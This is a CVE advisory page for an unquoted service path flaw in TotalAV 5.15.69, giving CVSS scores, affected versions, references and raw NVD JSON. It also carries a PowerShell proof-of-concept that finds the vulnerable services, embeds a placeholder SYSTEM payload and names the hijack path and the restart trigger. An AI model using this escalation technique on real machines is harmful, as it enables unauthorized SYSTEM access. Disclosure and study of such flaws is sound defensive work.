Security Vulnerability Report
CVE-2021-47787 CVSS 7.8 HIGH

CVE-2021-47787

Published: 2026-01-16 00:16:22
Last Modified: 2026-02-09 14:08:05

Description

TotalAV 5.15.69 contains an unquoted service path vulnerability in multiple system services running with LocalSystem privileges. Attackers can place malicious executables in specific unquoted path segments to potentially gain SYSTEM-level access by exploiting the service path configuration.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:totalav:totalav:5.15.69:*:*:*:*:*:*:* - VULNERABLE
TotalAV < 5.15.69
TotalAV 5.15.69 (affected version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
powershell
# CVE-2021-47787 PoC - TotalAV Unquoted Service Path
# This PoC demonstrates the path hijacking vulnerability

# C source of the placeholder payload, kept as a here-string (this script does not compile it)
$malicious_exe = @'
// Simple malicious executable placeholder
// In real attack, replace with actual payload
#include <windows.h>
#include <stdlib.h>

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // Payload execution with SYSTEM privileges
    system("cmd.exe /c whoami > C:\\temp\\pwned.txt");
    return 0;
}
'@

# Step 1: Identify unquoted service paths for TotalAV
# (binary path mentions TotalAV and contains no double quote)
$services = Get-WmiObject win32_service |
    Where-Object { $_.pathname -like '*TotalAV*' -and $_.pathname -notmatch '"' }
Write-Host "[+] Found TotalAV services with unquoted paths:"
$services | Select-Object name, pathname | Format-Table

# Step 2: Extract path segments to determine hijackable location
foreach ($svc in $services) {
    $path = $svc.pathname
    # Split the path into its directory segments, dropping empty entries
    $segments = $path -split '\\' | Where-Object { $_ -ne '' }
    Write-Host "[+] Service: $($svc.name)"
    Write-Host "[+] Checking writable path segments..."
}

# Step 3: Create malicious executable in hijacked location
# Note: Requires write access to a path segment before a space
# (PowerShell strings do not treat backslash as an escape, so single backslashes are used)
$target_path = "C:\Program Files\Program.exe"
Write-Host "[+] Creating malicious executable at: $target_path"
# In practice, compile and place actual payload here

# Step 4: Trigger service restart to execute payload
Write-Host "[+] Waiting for service restart..."
# Use: Restart-Service -Name "ServiceName" (requires admin)
Write-Host "[+] If successful, payload should execute with SYSTEM privileges"

References

https://www.exploit-db.com/exploits/50314 (Exploit, Third Party Advisory, VDB Entry)
https://www.totalav.com (Product)
https://www.vulncheck.com/advisories/totalav-unquoted-service-path (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47787", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:22.073", "lastModified": "2026-02-09T14:08:05.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TotalAV 5.15.69 contains an unquoted service path vulnerability in multiple system services running with LocalSystem privileges. Attackers can place malicious executables in specific unquoted path segments to potentially gain SYSTEM-level access by exploiting the service path configuration."}, {"lang": "es", "value": "TotalAV 5.15.69 contiene una vulnerabilidad de ruta de servicio sin comillas en múltiples servicios del sistema que se ejecutan con privilegios de LocalSystem. Los atacantes pueden colocar ejecutables maliciosos en segmentos de ruta sin comillas específicos para obtener potencialmente acceso a nivel de SYSTEM explotando la configuración de la ruta del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:totalav:totalav:5.15.69:*:*:*:*:*:*:*", "matchCriteriaId": "A83C7F91-391F-40CB-9E27-F31EBCC60B76"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50314", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.totalav.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/totalav-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50314", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}